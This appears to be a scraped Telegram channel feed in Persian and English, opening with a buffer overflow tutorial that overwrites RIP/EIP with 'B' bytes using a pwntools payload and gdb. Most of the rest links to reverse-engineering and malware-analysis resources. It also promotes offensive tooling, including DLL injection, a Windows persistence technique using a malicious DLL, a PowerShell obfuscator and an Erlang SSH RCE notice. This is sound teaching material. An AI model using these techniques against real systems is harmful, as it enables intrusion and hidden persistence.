بخش یازدهم بافر اورفلو

تست کنترل کامل RIP/EIP


میخوایم به برنامه بگیم که میتونیم RIP/EIP رو کنترل کنیم
یعنی کاری کنیم که مقدار ریجستر بشه 0x42424242 یا 4222222 هگز معادل BBBB

اگه این مرحله موفق بشه یعنی:

ما وارد مغز برنامه شدیم
از اینجا به بعد میتونیم مسیر اجرای برنامه رو خودمون تعیین کنیم


ساختن ورودی تست کنترل

الان باید یه ورودی بسازیم که:

112 کاراکتر اول  هرچی مثلا “A”

جای RIP  4 تا کاراکتر “B”

چون “B” در ASCII میشه 0x42  پس RIP باید بشه 0x42424242


برای مثال پایتونی ساده:

from pwn import *
offset = 112
payload = b"A" * offset
payload += b"B" * 8
    برای 64bit معمولا 8 بایت برای 32bit چهار بایت
print(payload)

اجرای برنامه با پیلود کنترل

برنامه رو اجرا میکنیم:

./vuln $(python3 exploit.py)

یا اگر ورودی از stdin میخواد:

python3 exploit.py | ./vuln

چک کردن اینکه RIP کنترل شده

داخل gdb:

(gdb) run < <(python3 exploit.py)

(gdb) info registers

اگر همه چی درست باشه باید ببینید:

RIP: 0x4242424242424242

یا تو نسخه 32bit:

EIP: 0x42424242

Part 11 Buffer Overflow

Full RIP/EIP Control Test

We want to tell the program that we can control RIP/EIP

That is, we make the register value 0x42424242 or 4222222 hex equivalent to BBBB

If this step is successful, it means:

We have entered the brain of the program
From here on, we can determine the path of the program execution ourselves

Creating a control test input

Now we need to create an input that:

The first 112 characters of anything, for example “A”

Instead of RIP, 4 characters “B”

Since “B” is 0x42 in ASCII, then RIP should be 0x42424242

For a simple Python example:

from pwn import *

offset = 112
payload = b"A" * offset
payload += b"B" * 8
For 64bit, usually 8 bytes, for 32bit, four Byte
print(payload)

Running the program with the control payload

We run the program:

./vuln $(python3 exploit.py)

Or if it asks for input from stdin:

python3 exploit.py | ./vuln

Checking that RIP is controlled

Inside gdb:

(gdb) run < <(python3 exploit.py)

(gdb) info registers

If everything is correct you should see:

RIP: 0x4242424242424242

Or in 32bit version:

EIP: 0x42424242

@reverseengine

Malware analysis of Sepsis ransomware:

https://www.reddit.com/r/MalwareAnalysis/comments/bgf71t/malware_analysis_of_sepsis_ransomware/

Analysis of malware attacked bank X customers:

https://www.reddit.com/r/MalwareAnalysis/comments/bgqz7m/analysis_of_malware_attacked_bank_x_customers/

Unpacking UPX manually:

https://www.reddit.com/user/Thatskriptkid/comments/c3csyd/unpacking_upx_manually/

Analysis of simple obfuscated office malware:

https://www.reddit.com/r/MalwareAnalysis/comments/bxvw1j/analysis_of_simple_obfuscated_office_malware/

@reverseengine

Introducing Lumen Server Protocol

https://abda.nl/posts/introducing-lumen/

A private Lumina server for IDA Pro

https://github.com/naim94a/lumen

Investigating IDA Lumina Feature

https://www.synacktiv.com/en/publications/investigating-ida-lumina-feature.html

Local server for IDA Lumina feature

https://github.com/synacktiv/lumina_server

@reverseengine

🎯 Week 79 — CVE‑2025‑32433 — Erlang/OTP SSH — Pre‑Auth RCE

🔹 CVE: CVE‑2025‑32433
🔹 Type: Remote Code Execution (pre‑authentication flaw in Erlang/OTP SSH server)
🔹 Impact: Full system compromise via crafted SSH messages — no credentials required
🔹 Fixed in: OTP‑27.3.3 / OTP‑26.2.5.11 / OTP‑25.3.2.20
🔹 Action: Patch immediately or disable SSH / restrict access by firewall

Exploit

#week_79

Injection DLLs into the explorer process using icons

https://github.com/d419h/IconJector

@reverseengine

🔒 تکنیک جدید Persist در ویندوز! 

📌 خلاصه مقاله: 
در این بخش به معرفی یک تکنیک پایداری (Persistence) در ویندوز می‌پردازیم که با استفاده از تزریق و جایگزینی DLL با دسترسی کاربر پیاده‌سازی شده است. در این روش، فایل DLL مخرب توسط فرآیند svchost.exe اجرا می‌شود و امکان اجرای مداوم و مخفیانه کد در سیستم هدف را فراهم می‌سازد.

#RedTeam #CyberSecurity
#Maldev #Persistence
#WindowsInternals

💬 Forum 
📣 DarkBit

Password: @DarkBitx

🔒 New Persist Technique in Windows!

📌 Article Summary:
In this section, we will introduce a persistence technique in Windows that is implemented using DLL injection and replacement with user access. In this method, the malicious DLL file is executed by the svchost.exe process, allowing continuous and secret code execution on the target system.

#RedTeam #CyberSecurity
#Maldev #Persistence
#WindowsInternals

💬 Forum 
📣 DarkBit

Exploit Development: Investigating Kernel Mode Shadow Stacks on Windows

https://connormcgarr.github.io/km-shadow-stacks

@reverseengine

Writing an operation system

https://www.youtube.com/playlist?list=PL980gcR1LE3LBuWuSv2CL28HsfnpC4Qf7

@reverseengine

Rowhammer Attacks on DDR5

https://thehackernews.com/2025/09/phoenix-rowhammer-attack-bypasses.html

https://youtu.be/1emxVQ6__qg

@reverseengine

PowerShell Obfuscator

https://github.com/TaurusOmar/psobf

@reverseengine

A Trace Explorer for Reverse Engineers

https://github.com/gaasedelen/tenet

@reverseengine

Ghidra Scripts/Plugins/Extension

https://github.com/AllsafeCyberSecurity/awesome-ghidra

@reverseengine

A Universal MCU Firmware Emulator for Dynamic Analysis without Any Hardware Dependence

https://github.com/MCUSec/uEmu

@reverseengine

VMProtect 2 - Detailed Analysis of the Virtual Machine Architecture

https://back.engineering/17/05/2021/

@reverseengine

Malware Research

https://0x0d4y.blog/amadey-targeted-analysis

@reverseengine